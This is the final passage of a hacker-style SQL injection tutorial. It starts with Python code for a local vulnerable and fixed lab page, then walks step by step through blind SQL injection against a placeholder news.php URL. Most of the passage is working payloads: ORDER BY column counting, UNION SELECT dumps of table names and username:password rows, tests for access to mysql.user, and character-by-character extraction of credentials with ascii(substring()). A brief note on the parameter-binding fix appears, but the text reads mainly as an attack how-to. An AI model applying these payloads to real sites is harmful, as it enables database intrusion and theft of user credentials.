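    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return f"SQL error: {e}"  # the error page the quote test looks for


def story_page_fixed(conn, id_param):
    """Same page with the parameter bound: whatever is sent is a value, never SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT ID, headline, body FROM story WHERE ID = ?", (id_value,)
    ).fetchall()


def count_columns(page, max_cols=50):
    """ORDER BY n probing: the largest n that does not error is the column count."""
    for n in range(1, max_cols + 1):
        if isinstance(page(f"12 ORDER BY {n}--"), str):
            return n - 1
    return None  # never errors: string context (see String Based Injection) or not injectable


def union_select(page, ncols, col, expr, tail=""):
    """Put `expr` in displayed column `col` of a UNION SELECT and return what comes back."""
    markers = [str(i) for i in range(1, ncols + 1)]
    markers[col - 1] = expr
    rows = page(f"null UNION SELECT {','.join(markers)}{tail}--")
    if isinstance(rows, str) or not rows:
        return None  # error page, or nothing rendered
    return rows[0][col - 1]


def dump_users(page, ncols, col):
    """Table names, then the users rows, the way the tutorials' final URLs do it."""
    tables = union_select(page, ncols, col, "group_concat(name, char(10))",
                          " FROM sqlite_master WHERE type='table'")
    creds = union_select(page, ncols, col,
                         "group_concat(username || ':' || password, char(10))",
                         " FROM users")
    return tables, creds


if __name__ == "__main__":
    conn = build_db()
    for name, handler in (("vulnerable", story_page_vulnerable), ("fixed", story_page_fixed)):
        page = lambda p, h=handler: h(conn, p)
        print(name, "quote test:", page("12'"))
        ncols = count_columns(page)
        print(name, "columns:", ncols)
        if ncols:
            print(name, "version:", union_select(page, ncols, 2, "sqlite_version()"))
            print(name, "dump:", dump_users(page, ncols, 2))
```

Against the vulnerable handler the quote test returns an error string, ORDER BY stops at 3, and column 2 carries the version, the table list and admin's hash out; against the fixed handler every payload fails int() and returns an empty result, so there is no column count, no marker and nothing to dump. The fix is the bound parameter, not the int() cast: binding is what keeps a string parameter (the String Based Injection case) safe as well.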
That's all for this part; now we can proceed to the harder part.

2. Blind SQL Injection
Blind injection is a little more complicated than classic injection, but it can be done.
I must mention, there is a very good blind SQL injection tutorial by xprog, so it's not bad to read it.
Let's start with the advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc…
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <— this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <— this is false
so if some text, picture or other content is missing from the returned page, then that site is vulnerable to blind SQL injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselects work
When nothing we select gets displayed, we have to use a subselect inside a condition
i.e.
http://www.site.com/news.php?id=5 and (select 1)=1
if the page loads normally then subselects work.
then we're gonna see if we have access to mysql.user
i.e.
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if the page loads normally we have access to mysql.user, which holds the password hashes; and if the account also has the FILE privilege, we can later read files with load_file() and write them with INTO OUTFILE.

3). Check table and column names
This is the part where guessing is your best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our subquery returns exactly 1 row; a subquery used in a comparison must return only one row, so this is very important.)
then if the page loads normally without content missing, the table users exists.
if you get FALSE (some article missing), just change the table name until you guess the right one
let's say that we have found that the table name is users; now what we need is a column name.
the same as the table name, we start guessing. Like I said before, try the common names for columns.
i.e.
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that the column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1), which is always '1' no matter what the password is; the query only fails when the column doesn't exist

4). Pull data from the database
we found table users and columns username, password, so we're gonna pull characters from them.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok, this pulls the first character from the first user in table users.
substring here returns the first character, 1 character in length. ascii() converts that character into its ASCII value
and then we compare it with the greater-than symbol >.
so if the ASCII value is greater than 80, the page loads normally (TRUE).
we keep trying until we get FALSE.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ASCII table we know that char(99) is the letter 'c'.
then let's check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far
so keep going until you get to the end (when >0 returns false we know that we have reached the end).

There are some tools for Blind SQL Injection; I think sqlmap is the best, but I'm doing everything manually,
because that makes you a better SQL injector.
Hope you learned something from this paper.
Have FUN! (: